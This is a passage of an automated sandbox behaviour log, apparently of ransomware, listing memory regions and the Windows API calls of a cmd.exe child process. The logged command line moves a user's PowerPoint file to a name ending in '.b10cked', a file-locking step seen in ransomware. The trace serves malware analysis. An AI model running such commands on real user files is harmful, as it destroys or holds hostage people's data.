0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35758 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35759 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35760 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 35761 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35762 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35763 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35764 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35765 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 35766 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 35767 start_va = 0x6efc0000 end_va = 0x6efdcfff entry_point = 0x6efc0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 35768 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35769 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 35770 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35771 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35772 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 35773 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35774 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35775 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35776 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 35777 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35778 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35779 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 35780 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35781 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 890 os_tid = 0xbf0 Process: id = "650" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16980" os_pid = "0xbf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35782 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35783 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35784 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35785 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 35786 start_va = 0x4a830000 end_va = 0x4a87bfff entry_point = 0x4a830000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35787 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35788 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35789 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35790 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 35791 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35802 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35803 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35804 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35805 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 35806 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 35807 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35808 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35809 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35810 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35811 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35812 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35813 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35814 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35815 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35816 start_va = 0x2d0000 end_va = 0x397fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 35817 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35818 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35819 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35820 start_va = 0x3a0000 end_va = 0x3a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 35821 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 35822 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 35823 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 35824 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 35825 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Thread: id = 891 os_tid = 0xbc8 [0236.669] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfa9c | out: lpSystemTimeAsFileTime=0x2cfa9c*(dwLowDateTime=0xc0871560, dwHighDateTime=0x1d440a9)) [0236.669] GetCurrentProcessId () returned 0xbf8 [0236.669] GetCurrentThreadId () returned 0xbc8 [0236.669] GetTickCount () returned 0x40efd [0236.669] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfa94 | out: lpPerformanceCount=0x2cfa94*=29345846714) returned 1 [0236.670] GetModuleHandleA (lpModuleName=0x0) returned 0x4a830000 [0236.670] __set_app_type (_Type=0x1) [0236.670] __p__fmode () returned 0x76b331f4 [0236.670] __p__commode () returned 0x76b331fc [0236.670] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8521a6) returned 0x0 [0236.670] __getmainargs (in: _Argc=0x4a854238, _Argv=0x4a854240, _Env=0x4a85423c, _DoWildCard=0, _StartInfo=0x4a854140 | out: _Argc=0x4a854238, _Argv=0x4a854240, _Env=0x4a85423c) returned 0 [0236.670] GetCurrentThreadId () returned 0xbc8 [0236.670] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbc8) returned 0x38 [0236.670] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0236.670] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0236.670] SetThreadUILanguage (LangId=0x0) returned 0x409 [0236.670] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0236.670] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfa2c | out: phkResult=0x2cfa2c*=0x0) returned 0x2 [0236.671] VirtualQuery (in: lpAddress=0x2cfa63, lpBuffer=0x2cf9fc, dwLength=0x1c | out: lpBuffer=0x2cf9fc*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0236.671] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf9fc, dwLength=0x1c | out: lpBuffer=0x2cf9fc*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0236.671] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf9fc, dwLength=0x1c | out: lpBuffer=0x2cf9fc*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0236.671] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cf9fc, dwLength=0x1c | out: lpBuffer=0x2cf9fc*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0236.671] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf9fc, dwLength=0x1c | out: lpBuffer=0x2cf9fc*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0236.671] GetConsoleOutputCP () returned 0x1b5 [0236.671] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1 [0236.671] SetConsoleCtrlHandler (HandlerRoutine=0x4a84e72a, Add=1) returned 1 [0236.671] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.671] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0236.671] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.671] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8541ac | out: lpMode=0x4a8541ac) returned 1 [0236.671] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.671] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0236.671] _get_osfhandle (_FileHandle=0) returned 0x3 [0236.671] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8541b0 | out: lpMode=0x4a8541b0) returned 1 [0236.672] _get_osfhandle (_FileHandle=0) returned 0x3 [0236.672] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0236.672] GetEnvironmentStringsW () returned 0xe0150* [0236.672] FreeEnvironmentStringsW (penv=0xe0150) returned 1 [0236.672] GetEnvironmentStringsW () returned 0xe0150* [0236.672] FreeEnvironmentStringsW (penv=0xe0150) returned 1 [0236.672] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce99c | out: phkResult=0x2ce99c*=0x40) returned 0x0 [0236.672] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x0, lpData=0x2ce9a8*=0x78, lpcbData=0x2ce9a0*=0x1000) returned 0x2 [0236.672] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x4, lpData=0x2ce9a8*=0x1, lpcbData=0x2ce9a0*=0x4) returned 0x0 [0236.672] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x0, lpData=0x2ce9a8*=0x1, lpcbData=0x2ce9a0*=0x1000) returned 0x2 [0236.672] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x4, lpData=0x2ce9a8*=0x0, lpcbData=0x2ce9a0*=0x4) returned 0x0 [0236.672] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x4, lpData=0x2ce9a8*=0x40, lpcbData=0x2ce9a0*=0x4) returned 0x0 [0236.672] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x4, lpData=0x2ce9a8*=0x40, lpcbData=0x2ce9a0*=0x4) returned 0x0 [0236.672] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x0, lpData=0x2ce9a8*=0x40, lpcbData=0x2ce9a0*=0x1000) returned 0x2 [0236.672] RegCloseKey (hKey=0x40) returned 0x0 [0236.673] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce99c | out: phkResult=0x2ce99c*=0x40) returned 0x0 [0236.673] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x0, lpData=0x2ce9a8*=0x40, lpcbData=0x2ce9a0*=0x1000) returned 0x2 [0236.673] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x4, lpData=0x2ce9a8*=0x1, lpcbData=0x2ce9a0*=0x4) returned 0x0 [0236.673] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x0, lpData=0x2ce9a8*=0x1, lpcbData=0x2ce9a0*=0x1000) returned 0x2 [0236.673] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x4, lpData=0x2ce9a8*=0x0, lpcbData=0x2ce9a0*=0x4) returned 0x0 [0236.673] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x4, lpData=0x2ce9a8*=0x9, lpcbData=0x2ce9a0*=0x4) returned 0x0 [0236.673] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x4, lpData=0x2ce9a8*=0x9, lpcbData=0x2ce9a0*=0x4) returned 0x0 [0236.673] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x0, lpData=0x2ce9a8*=0x9, lpcbData=0x2ce9a0*=0x1000) returned 0x2 [0236.673] RegCloseKey (hKey=0x40) returned 0x0 [0236.673] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c4 [0236.673] srand (_Seed=0x5b8863c4) [0236.673] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx.b10cked\"" [0236.673] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx.b10cked\"" [0236.673] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a855260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.673] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xe18b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0236.673] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0236.673] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0236.674] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0236.674] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0236.674] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0236.674] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0236.674] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0236.674] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0236.674] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0236.674] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0236.674] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0236.674] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0236.674] GetEnvironmentStringsW () returned 0xe22a0* [0236.674] FreeEnvironmentStringsW (penv=0xe22a0) returned 1 [0236.674] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.674] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0236.674] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0236.674] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0236.674] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0236.674] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0236.674] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0236.674] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0236.674] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0236.674] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0236.674] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf768 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.674] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf768, lpFilePart=0x2cf764 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf764*="Desktop") returned 0x18 [0236.674] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0236.674] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf4e4 | out: lpFindFileData=0x2cf4e4) returned 0xdffe0 [0236.675] FindClose (in: hFindFile=0xdffe0 | out: hFindFile=0xdffe0) returned 1 [0236.675] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf4e4 | out: lpFindFileData=0x2cf4e4) returned 0xdffe0 [0236.675] FindClose (in: hFindFile=0xdffe0 | out: hFindFile=0xdffe0) returned 1 [0236.675] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf4e4 | out: lpFindFileData=0x2cf4e4) returned 0xdffe0 [0236.675] FindClose (in: hFindFile=0xdffe0 | out: hFindFile=0xdffe0) returned 1 [0236.675] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0236.675] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0236.675] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0236.675] GetEnvironmentStringsW () returned 0xe2ac0* [0236.675] FreeEnvironmentStringsW (penv=0xe2ac0) returned 1 [0236.675] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a855260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.676] GetConsoleOutputCP () returned 0x1b5 [0236.676] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1 [0236.676] GetUserDefaultLCID () returned 0x409 [0236.676] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a854950, cchData=8 | out: lpLCData=":") returned 2 [0236.676] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf8a8, cchData=128 | out: lpLCData="0") returned 2 [0236.676] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf8a8, cchData=128 | out: lpLCData="0") returned 2 [0236.676] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf8a8, cchData=128 | out: lpLCData="1") returned 2 [0236.676] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a854940, cchData=8 | out: lpLCData="/") returned 2 [0236.676] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a854d80, cchData=32 | out: lpLCData="Mon") returned 4 [0236.676] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a854d40, cchData=32 | out: lpLCData="Tue") returned 4 [0236.676] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a854d00, cchData=32 | out: lpLCData="Wed") returned 4 [0236.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a854cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0236.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a854c80, cchData=32 | out: lpLCData="Fri") returned 4 [0236.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a854c40, cchData=32 | out: lpLCData="Sat") returned 4 [0236.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a854c00, cchData=32 | out: lpLCData="Sun") returned 4 [0236.677] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a854930, cchData=8 | out: lpLCData=".") returned 2 [0236.677] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a854920, cchData=8 | out: lpLCData=",") returned 2 [0236.677] setlocale (category=0, 